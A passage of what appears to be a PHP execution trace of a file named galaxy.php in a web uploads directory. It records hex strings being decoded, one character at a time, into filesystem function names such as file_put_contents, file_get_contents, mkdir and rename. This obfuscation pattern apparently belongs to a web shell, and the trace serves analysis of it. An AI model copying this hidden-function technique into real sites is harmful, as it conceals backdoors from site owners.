3	215	0	0.008133	480664	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	215	1	0.008144	480704
3	215	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	216	0	0.008174	480728	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	216	1	0.008186	480776
3	216	R			105
3	217	0	0.008198	480696	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	217	1	0.008209	480736
3	217	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	218	0	0.008239	480728	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	218	1	0.008250	480776
3	218	R			108
3	219	0	0.008262	480696	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	219	1	0.008273	480736
3	219	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	220	0	0.008302	480728	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	220	1	0.008314	480776
3	220	R			101
3	221	0	0.008326	480696	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	221	1	0.008370	480736
3	221	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	222	0	0.008400	480728	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	222	1	0.008412	480776
3	222	R			95
3	223	0	0.008424	480696	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	223	1	0.008436	480736
3	223	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	224	0	0.008476	480728	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	224	1	0.008488	480776
3	224	R			101
3	225	0	0.008500	480696	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	225	1	0.008511	480736
3	225	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	226	0	0.008543	480728	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'78'
3	226	1	0.008555	480776
3	226	R			120
3	227	0	0.008575	480696	chr	0		/var/www/html/uploads/galaxy.php	25	1	120
3	227	1	0.008586	480736
3	227	R			'x'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'x'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	228	0	0.008616	480728	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	228	1	0.008628	480776
3	228	R			105
3	229	0	0.008640	480696	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	229	1	0.008651	480736
3	229	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	230	0	0.008680	480736	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	230	1	0.008696	480784
3	230	R			115
3	231	0	0.008708	480704	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	231	1	0.008719	480744
3	231	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	232	0	0.008749	480736	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	232	1	0.008760	480784
3	232	R			116
3	233	0	0.008773	480704	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	233	1	0.008783	480744
3	233	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	234	0	0.008812	480736	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	234	1	0.008823	480784
3	234	R			115
3	235	0	0.008835	480704	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	235	1	0.008847	480744
3	235	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	213	1	0.008878	480704
2	213	R			'file_exists'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[12] = 'file_exists'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	236	0	0.009053	480704	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'66696c655f7075745f636f6e74656e7473'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 33
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	237	0	0.009096	480736	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	237	1	0.009108	480784
3	237	R			102
3	238	0	0.009121	480704	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	238	1	0.009132	480744
3	238	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	239	0	0.009162	480768	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	239	1	0.009174	480816
3	239	R			105
3	240	0	0.009186	480736	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	240	1	0.009198	480776
3	240	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	241	0	0.009227	480768	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	241	1	0.009239	480816
3	241	R			108
3	242	0	0.009251	480736	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	242	1	0.009263	480776
3	242	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	243	0	0.009292	480768	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	243	1	0.009304	480816
3	243	R			101
3	244	0	0.009316	480736	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	244	1	0.009327	480776
3	244	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	245	0	0.009357	480768	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	245	1	0.009369	480816
3	245	R			95
3	246	0	0.009381	480736	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	246	1	0.009392	480776
3	246	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	247	0	0.009422	480768	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	247	1	0.009434	480816
3	247	R			112
3	248	0	0.009445	480736	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	248	1	0.009456	480776
3	248	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	249	0	0.009486	480768	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'75'
3	249	1	0.009497	480816
3	249	R			117
3	250	0	0.009509	480736	chr	0		/var/www/html/uploads/galaxy.php	25	1	117
3	250	1	0.009520	480776
3	250	R			'u'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'u'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	251	0	0.009556	480768	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	251	1	0.009568	480816
3	251	R			116
3	252	0	0.009580	480736	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	252	1	0.009591	480776
3	252	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	253	0	0.009620	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	253	1	0.009633	480824
3	253	R			95
3	254	0	0.009645	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	254	1	0.009656	480784
3	254	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	255	0	0.009685	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'63'
3	255	1	0.009697	480824
3	255	R			99
3	256	0	0.009709	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	99
3	256	1	0.009720	480784
3	256	R			'c'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'c'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	257	0	0.009749	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6f'
3	257	1	0.009761	480824
3	257	R			111
3	258	0	0.009773	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	111
3	258	1	0.009784	480784
3	258	R			'o'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'o'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	259	0	0.009814	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6e'
3	259	1	0.009826	480824
3	259	R			110
3	260	0	0.009838	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	110
3	260	1	0.009849	480784
3	260	R			'n'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'n'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	261	0	0.009879	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	261	1	0.009891	480824
3	261	R			116
3	262	0	0.009903	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	262	1	0.009914	480784
3	262	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	263	0	0.009943	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	263	1	0.009954	480824
3	263	R			101
3	264	0	0.009966	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	264	1	0.009977	480784
3	264	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	265	0	0.010006	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6e'
3	265	1	0.010018	480824
3	265	R			110
3	266	0	0.010030	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	110
3	266	1	0.010041	480784
3	266	R			'n'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'n'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	267	0	0.010070	480776	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	267	1	0.010082	480824
3	267	R			116
3	268	0	0.010094	480744	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	268	1	0.010105	480784
3	268	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	269	0	0.010134	480784	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	269	1	0.010145	480832
3	269	R			115
3	270	0	0.010157	480752	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	270	1	0.010169	480792
3	270	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	236	1	0.010198	480752
2	236	R			'file_put_contents'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[13] = 'file_put_contents'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	271	0	0.010233	480752	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'66696c655f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 33
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	272	0	0.010279	480784	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	272	1	0.010291	480832
3	272	R			102
3	273	0	0.010303	480752	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	273	1	0.010314	480792
3	273	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	274	0	0.010344	480816	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	274	1	0.010356	480864
3	274	R			105
3	275	0	0.010368	480784	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	275	1	0.010379	480824
3	275	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	276	0	0.010409	480816	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	276	1	0.010421	480864
3	276	R			108
3	277	0	0.010433	480784	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	277	1	0.010444	480824
3	277	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	278	0	0.010473	480816	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	278	1	0.010485	480864
3	278	R			101
3	279	0	0.010497	480784	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	279	1	0.010508	480824
3	279	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	280	0	0.010538	480816	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	280	1	0.010550	480864
3	280	R			95
3	281	0	0.010562	480784	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	281	1	0.010573	480824
3	281	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	282	0	0.010603	480816	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'67'
3	282	1	0.010615	480864
3	282	R			103
3	283	0	0.010627	480784	chr	0		/var/www/html/uploads/galaxy.php	25	1	103
3	283	1	0.010638	480824
3	283	R			'g'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'g'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	284	0	0.010667	480816	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	284	1	0.010679	480864
3	284	R			101
3	285	0	0.010691	480784	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	285	1	0.010702	480824
3	285	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	286	0	0.010732	480816	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	286	1	0.010744	480864
3	286	R			116
3	287	0	0.010755	480784	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	287	1	0.010766	480824
3	287	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	288	0	0.010804	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'5f'
3	288	1	0.010818	480872
3	288	R			95
3	289	0	0.010830	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	95
3	289	1	0.010841	480832
3	289	R			'_'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= '_'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	290	0	0.010871	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'63'
3	290	1	0.010883	480872
3	290	R			99
3	291	0	0.010895	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	99
3	291	1	0.010907	480832
3	291	R			'c'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'c'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	292	0	0.010936	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6f'
3	292	1	0.010948	480872
3	292	R			111
3	293	0	0.010960	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	111
3	293	1	0.010971	480832
3	293	R			'o'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'o'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	294	0	0.011006	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6e'
3	294	1	0.011018	480872
3	294	R			110
3	295	0	0.011029	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	110
3	295	1	0.011041	480832
3	295	R			'n'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'n'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	296	0	0.011071	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	296	1	0.011083	480872
3	296	R			116
3	297	0	0.011095	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	297	1	0.011106	480832
3	297	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	298	0	0.011136	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	298	1	0.011148	480872
3	298	R			101
3	299	0	0.011160	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	299	1	0.011171	480832
3	299	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	300	0	0.011200	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6e'
3	300	1	0.011212	480872
3	300	R			110
3	301	0	0.011224	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	110
3	301	1	0.011235	480832
3	301	R			'n'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'n'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	302	0	0.011265	480824	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	302	1	0.011276	480872
3	302	R			116
3	303	0	0.011288	480792	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	303	1	0.011299	480832
3	303	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	304	0	0.011329	480832	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	304	1	0.011340	480880
3	304	R			115
3	305	0	0.011352	480800	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	305	1	0.011363	480840
3	305	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	271	1	0.011393	480800
2	271	R			'file_get_contents'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[14] = 'file_get_contents'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	306	0	0.011429	480800	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'6d6b646972'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 9
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	307	0	0.011470	480832	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6d'
3	307	1	0.011482	480880
3	307	R			109
3	308	0	0.011494	480800	chr	0		/var/www/html/uploads/galaxy.php	25	1	109
3	308	1	0.011505	480840
3	308	R			'm'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'm'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	309	0	0.011534	480864	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6b'
3	309	1	0.011546	480912
3	309	R			107
3	310	0	0.011558	480832	chr	0		/var/www/html/uploads/galaxy.php	25	1	107
3	310	1	0.011569	480872
3	310	R			'k'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'k'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	311	0	0.011599	480864	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'64'
3	311	1	0.011611	480912
3	311	R			100
3	312	0	0.011623	480832	chr	0		/var/www/html/uploads/galaxy.php	25	1	100
3	312	1	0.011634	480872
3	312	R			'd'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'd'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	313	0	0.011664	480864	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	313	1	0.011677	480912
3	313	R			105
3	314	0	0.011689	480832	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	314	1	0.011701	480872
3	314	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	315	0	0.011740	480864	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	315	1	0.011752	480912
3	315	R			114
3	316	0	0.011765	480832	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	316	1	0.011776	480872
3	316	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	306	1	0.011807	480832
2	306	R			'mkdir'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[15] = 'mkdir'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	317	0	0.011842	480832	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'72656e616d65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 11
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	318	0	0.011883	480864	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	318	1	0.011896	480912
3	318	R			114
3	319	0	0.011908	480832	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	319	1	0.011920	480872
3	319	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	320	0	0.011950	480896	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	320	1	0.011962	480944
3	320	R			101
3	321	0	0.011974	480864	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	321	1	0.011986	480904
3	321	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	322	0	0.012016	480896	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6e'
3	322	1	0.012028	480944
3	322	R			110
3	323	0	0.012040	480864	chr	0		/var/www/html/uploads/galaxy.php	25	1	110
3	323	1	0.012052	480904
3	323	R			'n'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'n'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	324	0	0.012083	480896	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	324	1	0.012095	480944
3	324	R			97
3	325	0	0.012107	480864	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	325	1	0.012119	480904
3	325	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	326	0	0.012149	480896	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6d'
3	326	1	0.012161	480944
3	326	R			109
3	327	0	0.012173	480864	chr	0		/var/www/html/uploads/galaxy.php	25	1	109
3	327	1	0.012184	480904
3	327	R			'm'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'm'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	328	0	0.012214	480896	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	328	1	0.012226	480944
3	328	R			101
3	329	0	0.012238	480864	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	329	1	0.012250	480904
3	329	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	317	1	0.012280	480864
2	317	R			'rename'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[16] = 'rename'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	330	0	0.012314	480864	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'737472746f74696d65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 17
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	331	0	0.012355	480896	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	331	1	0.012367	480944
3	331	R			115
3	332	0	0.012379	480864	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	332	1	0.012391	480904
3	332	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	333	0	0.012420	480928	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	333	1	0.012432	480976
3	333	R			116
3	334	0	0.012445	480896	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	334	1	0.012461	480936
3	334	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	335	0	0.012490	480928	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	335	1	0.012502	480976
3	335	R			114
3	336	0	0.012514	480896	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	336	1	0.012525	480936
3	336	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	337	0	0.012555	480928	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	337	1	0.012566	480976
3	337	R			116
3	338	0	0.012578	480896	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	338	1	0.012589	480936
3	338	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	339	0	0.012618	480928	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6f'
3	339	1	0.012630	480976
3	339	R			111
3	340	0	0.012641	480896	chr	0		/var/www/html/uploads/galaxy.php	25	1	111
3	340	1	0.012652	480936
3	340	R			'o'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'o'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	341	0	0.012681	480928	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	341	1	0.012693	480976
3	341	R			116
3	342	0	0.012705	480896	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	342	1	0.012716	480936
3	342	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	343	0	0.012745	480928	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	343	1	0.012757	480976
3	343	R			105
3	344	0	0.012769	480896	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	344	1	0.012780	480936
3	344	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	345	0	0.012810	480928	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6d'
3	345	1	0.012821	480976
3	345	R			109
3	346	0	0.012833	480896	chr	0		/var/www/html/uploads/galaxy.php	25	1	109
3	346	1	0.012844	480936
3	346	R			'm'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'm'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	347	0	0.012876	480936	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	347	1	0.012941	480984
3	347	R			101
3	348	0	0.012956	480904	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	348	1	0.012968	480944
3	348	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	330	1	0.012998	480904
2	330	R			'strtotime'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[17] = 'strtotime'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	349	0	0.013032	480904	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'68746d6c7370656369616c6368617273'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 31
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	350	0	0.013073	480936	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'68'
3	350	1	0.013085	480984
3	350	R			104
3	351	0	0.013097	480904	chr	0		/var/www/html/uploads/galaxy.php	25	1	104
3	351	1	0.013109	480944
3	351	R			'h'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'h'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	352	0	0.013138	480968	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	352	1	0.013150	481016
3	352	R			116
3	353	0	0.013162	480936	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	353	1	0.013173	480976
3	353	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	354	0	0.013202	480968	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6d'
3	354	1	0.013214	481016
3	354	R			109
3	355	0	0.013230	480936	chr	0		/var/www/html/uploads/galaxy.php	25	1	109
3	355	1	0.013242	480976
3	355	R			'm'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'm'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	356	0	0.013271	480968	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	356	1	0.013283	481016
3	356	R			108
